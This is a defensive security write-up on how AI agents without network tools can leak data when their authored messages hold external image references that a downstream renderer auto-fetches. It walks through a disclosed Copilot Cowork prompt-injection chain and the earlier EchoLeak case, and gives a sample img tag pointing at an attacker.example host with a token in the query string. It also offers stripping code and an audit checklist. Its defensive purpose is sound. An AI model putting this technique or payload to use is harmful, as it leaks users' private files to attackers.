Agent-Authored Messages as a Deferred Exfiltration Channel

An auto-fetching renderer downstream of an agent's authoring tool acts as deferred egress — closing the lethal trifecta without a network grant.

An agent without a network tool is not a closed-egress agent. If it can author messages on a surface whose renderer auto-fetches external resources, the renderer performs egress on the user's behalf. The lethal trifecta closes through composition, not a single tool grant.

The composite-egress mechanism

The lethal trifecta normally treats external communication as a tool the agent invokes directly (Lethal Trifecta Threat Model). The agent-authored-message pattern manufactures the third leg by chaining two non-egress tools:

1. The agent invokes an internal "send message" tool with no network access of its own.
2. The message embeds external resource references (markdown images, <img> tags, link previews).
3. A downstream renderer (email client, chat surface, feed UI) auto-fetches them when a user or scheduled task opens the message.
4. The attacker's server logs the request and any data in the query string.

This is the same threat that URL Exfiltration Guard addresses: the URL carries the data. The difference is that the renderer performs the fetch, not the agent process.
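As a rough illustration of why the query string matters, the following Python sketch lists the requests an image-loading renderer would issue for a message body, along with the data each request would carry. The regular expressions, the function name `auto_fetched_requests`, and the example hosts are assumptions made for illustration; they cover only plain markdown images and `<img src>` attributes and are not a complete parser.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical patterns: plain markdown images and quoted <img src="..."> only.
MD_IMAGE = re.compile(r'!\[[^\]]*\]\((https?://[^)\s]+)')
HTML_IMG = re.compile(
    r'<img\b[^>]*?\bsrc\s*=\s*["\'](https?://[^"\']+)["\']', re.IGNORECASE
)


def auto_fetched_requests(message: str) -> list[dict]:
    """List the requests a renderer would issue if it auto-loads images."""
    requests = []
    for url in MD_IMAGE.findall(message) + HTML_IMG.findall(message):
        parts = urlsplit(url)
        requests.append({
            "host": parts.hostname,          # who receives the request
            "path": parts.path,
            "query": parse_qs(parts.query),  # data visible in the server log
        })
    return requests


# Example message with made-up hosts; the query string carries an encoded link.
message = (
    "Weekly summary attached. "
    '<img src="https://attacker.example/pixel.png'
    '?d=https%3A%2F%2Ftenant.example%2Fdownload%3Ftoken%3Dabc">'
)
for req in auto_fetched_requests(message):
    print(req["host"], req["query"])
```

In this example the host `attacker.example` receives the decoded download link as the `d` parameter, even though the agent process itself never opened a network connection.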

The Copilot Cowork incident

PromptArmor disclosed this composition against Microsoft Copilot Cowork on 26 May 2026 (PromptArmor disclosure). Cowork's documentation says sensitive actions like sending emails or Teams messages require user approval. But when the recipient is the active user, these actions execute without approval, and users cannot change that behavior.

The attack chain:

1. A user uploads a skill file carrying prompt injection (skills load automatically from a specific OneDrive path).
2. A routine "summarize what I worked on this week" query triggers the skill.
3. The injection makes the agent post a Teams message with HTML <img> tags whose src attributes are attacker URLs carrying OneDrive pre-authenticated download links in the query string.
4. Opening the message fetches the images, leaking the download links to the attacker, who then visits them and downloads the files. (PromptArmor disclosure)

PromptArmor reported 5/5 attack success across both Claude Opus 4.7 and the auto-routing model selector. The injection occupied only 5 of the skill file's 81 lines (PromptArmor disclosure).

Why it works

The mechanism is the composition rule, not a single bug. PromptArmor states it directly: "Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent" (PromptArmor disclosure). The fetch primitive that lets a recipient see an embedded chart becomes an exfiltration leg when the author is an LLM responding to attacker-controlled content.

The OneDrive pre-authenticated download link amplifies the impact from beacon to file content: a leaked URL is not a tracking pixel but a working download credential anyone can use, turning leaked metadata into a leaked file.

The same composition appeared in 2025 against Microsoft 365 Copilot as EchoLeak (CVE-2025-32711), where reference-style markdown images survived Copilot's link-redaction safeguards and the renderer auto-fetched them (Aim Labs / arxiv; The Hacker News). Microsoft shipped server-side fixes by May 2025 and documents HTML image injection as a defense-in-depth target (Microsoft MSRC), yet Cowork shows the same leg reappearing on a different M365 surface roughly a year later.

Defenses

Three controls compose into a defense in depth:

| Control | Layer | What it does |
| --- | --- | --- |
| Strip or rewrite external resource references at write time | Agent | Remove `<img src="…">`, markdown `![]()` references, and link previews before content is persisted |
| Gate resource fetches on explicit user intent | Renderer | Default to "do not load remote images", matching email-client norms for untrusted senders |
| Restrict the data amplifier | Data source | Block download links at the storage layer; for SharePoint, `Set-SPOSite -Identity <site> -BlockDownloadPolicy $true` removes the pre-authenticated download surface (PromptArmor disclosure) |

The agent-side and renderer-side controls are orthogonal. The agent-side control is brittle: pattern matching misses redirect chains, data URLs, CSS background images, and srcset permutations. The renderer-side control matches the email-client default and has a smaller policy surface, so teams owning both surfaces should apply both. Microsoft lists deterministic blocking of HTML image injection as a defense layer (Microsoft Learn), but Cowork shows it must be applied per surface: agent-authored Teams messages are distinct from the incoming email that Copilot processes.
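A minimal sketch of the agent-side, write-time control might look like the following. It takes a deny-by-default stance and removes every image reference it recognizes rather than trying to classify URLs. The patterns and the function name `strip_image_references` are assumptions for illustration, and the sketch shares the brittleness described above: it does not handle link previews, CSS backgrounds, `srcset` on other elements, or redirects behind ordinary links.

```python
import re

# Deliberately simple patterns; assumptions for this sketch, not a full grammar.
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
# Inline ![alt](url), reference ![alt][ref], collapsed ![alt][] and shortcut ![alt].
MD_IMAGE = re.compile(r"!\[([^\]]*)\](?:\([^)]*\)|\[[^\]]*\])?")

PLACEHOLDER = "[image removed]"


def strip_image_references(body: str) -> str:
    """Remove image references from agent-authored content before it is persisted."""
    body = HTML_IMG.sub(PLACEHOLDER, body)
    # Keep the alt text when there is any, so the message stays readable.
    body = MD_IMAGE.sub(lambda m: m.group(1) or PLACEHOLDER, body)
    return body


# Example draft with a made-up attacker host.
draft = (
    "Summary of this week.\n"
    '<img src="https://attacker.example/p.png?d=secret">\n'
    "![chart][ref]\n"
)
print(strip_image_references(draft))
```

Removing all images is stricter than most surfaces will tolerate. An allowlist of trusted image hosts is a common relaxation, but it reintroduces URL parsing and with it the bypass classes listed above.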

When this backfires

The defense work is wasted when the composition is already broken at another leg:

- Trusted-by-design recipients: if the only consumer is an operator on a plain-text inbox, no renderer auto-fetches resources and the exfil leg does not exist.
- No private-data context: an agent with untrusted input and an authoring tool but no sensitive corpora has nothing worth exfiltrating, so the trifecta is broken at leg 1.
- Markdown-aware LLM consumers: when the consumer is another LLM that ingests markdown without auto-fetching resources, the renderer leg is absent by the consumer's nature.
- Renderer outside your authority: when another vendor owns the renderer and you cannot force it to gate fetches, write-time stripping degrades into brittle pattern matching, a tactical patch with residual risk.

Scheduled tasks compound the surface: a "weekly review" task that loads a poisoned skill exfiltrates on every run without oversight (PromptArmor disclosure). Treat any recurring agent-authored message workflow as a higher-priority audit target.

Audit checklist

For any agent that can write to a user-facing surface, four "Yes" answers mean the composite-egress leg is open:

1. Read access to private data (SharePoint, OneDrive, internal repos, PII)?
2. Consumes untrusted input (web pages, uploaded files, MCP servers, skills)?
3. Can write to a surface (email, chat, ticket, dashboard, feed)?
4. Does that surface's renderer auto-fetch referenced external resources?

The tool inventory looks benign in isolation; the closed trifecta becomes visible only when the renderer is included in the audit.
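The checklist can be recorded per agent and per surface so that the renderer question is never skipped. The sketch below is one possible encoding in Python; the class name `SurfaceAudit`, its field names, and the example entry are hypothetical and not taken from any tool.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SurfaceAudit:
    """Answers to the four checklist questions for one agent and one surface."""
    reads_private_data: bool
    consumes_untrusted_input: bool
    writes_to_surface: bool
    renderer_auto_fetches: bool

    def composite_egress(self) -> bool:
        # Egress exists only when the agent can write AND the renderer fetches.
        return self.writes_to_surface and self.renderer_auto_fetches

    def exposed(self) -> bool:
        # Four "Yes" answers: private data, untrusted input, composite egress.
        return (
            self.reads_private_data
            and self.consumes_untrusted_input
            and self.composite_egress()
        )


# Hypothetical inventory entry for a chat-posting assistant.
audit = SurfaceAudit(
    reads_private_data=True,
    consumes_untrusted_input=True,
    writes_to_surface=True,
    renderer_auto_fetches=True,
)
print(audit.exposed())
```

Keeping `renderer_auto_fetches` as its own field makes the composition explicit: flipping that single answer to `False` is enough to make `exposed()` return `False`, which corresponds to the renderer-side control.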

Key Takeaways

- An agent without a network tool can still exfiltrate when its output surface has an auto-fetching renderer downstream
- The lethal trifecta closes through composition; audit renderers, not just agent tool grants
- Pre-authenticated storage download links amplify the leak from beacon to file content; restrict them at the storage layer
- Two Microsoft incidents (EchoLeak 2025, Copilot Cowork 2026) used the same renderer-fetch primitive on different M365 surfaces
- Agent-side URL stripping is brittle; gating fetches in the renderer matches email-client defaults and has a smaller policy surface